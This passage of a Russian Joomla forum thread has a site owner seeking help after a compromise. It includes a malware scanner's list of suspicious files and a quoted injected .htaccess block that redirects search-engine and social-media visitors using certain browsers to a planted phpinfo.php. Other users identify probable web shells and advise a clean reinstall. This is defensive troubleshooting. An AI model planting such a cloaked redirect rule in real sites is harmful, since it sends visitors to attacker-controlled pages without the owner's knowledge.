modules/mod_mainmenu/legacy.php                                    preg_match(   
modules/mod_mainmenu/legacy.php                            stripslashes   
modules/mod_feed/tmpl/index.php                       eval(   
modules/mod_syndicate/helper.php                            preg_match(   
modules/mod_newsflash/helper.php                          preg_replace   
modules/mod_login/helper.php   base64   
modules/phpinfo.php                           base64   У
modules/phpinfo.php                                IFRAME   
modules/mod_breadcrumbs/helper.php   stripslashes   
modules/mod_wrapper/tmpl/default.php   IFRAME   
modules/mod_simpleform2/kcaptcha/kcaptcha.php                                  preg_match(   
modules/mod_simpleform2/simpleform2.class.php              base64   
modules/mod_simpleform2/simpleform2.class.php                      preg_mateval(   
libraries/joomla/updater/adapters/collection.php    ch(   
modules/mod_simpleform2/simpleform2.class.php                       preg_replace   
modules/mod_simpleform2/simpleform2.class.php                       tmp_name   
modules/mod_simpleform2/engine.php                          $_POST   
modules/mod_simpleform2/engine.php                  stripslashes   
modules/mod_articles_archive/tmpl/index.php   eval(
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
В .htaccess примерно такой текст:
Цитировать
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace|web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/phpinfo.php
RewriteRule (.*) /phpinfo.php?query=$1 [QSA,L]
</IfModule>
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Сейчас только внимание обратила на формулировку в .htaccess и меня смутил
Цитировать
mod_rewrite.c
. что это такое? или так и должно быть?
« Последнее редактирование: 29.09.2013, 18:47:14 от OLI4KA »
*

SmokerMan

  • Гуру
  • 5293
  • 720 / 26
Движок - Joomla 1.5.26
в Joomla 1.5.26 нет com_finder) Этот компонент появился только в 2.5+
уже бы определились какая версия, что ли)

Цитировать
libraries/phpinfo.php                                                                base64  
libraries/phpinfo.php                                                                 IFRAME    
...
libraries/geshi/geshi/php.php                eval(    
...
modules/mod_articles_archive/tmpl/index.php   eval(
...
и т.д. и т.п.
это все скорее всего шелы. Так что через них могут делать что захотят.
*

draff

  • Гуру
  • 5090
  • 357 / 7
  • ищу работу
Если еще есть .htaccess с таким кодом- удалить код
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
я устанавливала 2.5, но она не пошла и я сделала откат, возможно файл остался. Сейчас удалю его.
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
они все с таким кодом!
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Сейчас посмотрела .htaccess и такой код не только в кэше, но и в других папках. их тоже удалять?
*

draff

  • Гуру
  • 5090
  • 357 / 7
  • ищу работу
Сделайте проще, для себя и для нас.В стандартной Joomla более 5000 файлов.
Бекап есть- файлы и база данных.
Установите новую Joomla той же версии.Установите такие же расширения.А потом подключите старую БД к новому сайту.
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
это все скорее всего шелы. Так что через них могут делать что захотят.

Шелы только те файлы, которые вы указали или все, содержащие в себе base64, eval(, IFRAME. А то я чет начала все подряд удалять и у меня сайт вообще исчез...вместо сайта окно с надписью: удаленный сервер или файл не найден...
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Сделайте проще, для себя и для нас.В стандартной Joomla более 5000 файлов.
Бекап есть- файлы и база данных.
Установите новую Joomla той же версии.Установите такие же расширения.А потом подключите старую БД к новому сайту.
Написать легко, но я в принципе не понимаю как это сделать...Если опишите подробнее алгоритм, то я все сделаю!
*

SmokerMan

  • Гуру
  • 5293
  • 720 / 26
Написать легко, но я в принципе не понимаю как это сделать...Если опишите подробнее алгоритм, то я все сделаю!
что там описывать?)
1. Берете чистую Joomla 1.5.26 c оф. сайта, ссылку давал выше
2. Устанавливаете ее в отдельную директорию денвера или что там стоит на локальном компьютере
3. Устанавливаете на нее все дополнительные расширения, которые были на старом сайте (лучше сразу искать последние версии)
4. Берете базу данных со старого сайта и перекидываете ее на новый.

все.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 326
Последний ответ 19.07.2020, 23:57:17
от wishlight
Испортилась админка

Автор YuliyVP

Ответов: 4
Просмотров: 392
Последний ответ 05.09.2019, 09:03:21
от winstrool
Вредоносный код в url после якоря #

Автор dm-krv

Ответов: 7
Просмотров: 625
Последний ответ 10.07.2018, 14:12:29
от dm-krv
Открытие несуществующих страниц после лечения от вирусов

Автор DimentR

Ответов: 9
Просмотров: 753
Последний ответ 07.02.2018, 18:04:23
от surho
БД после взлома

Автор cntrl

Ответов: 11
Просмотров: 627
Последний ответ 09.01.2018, 17:06:17
от Aleks.Denezh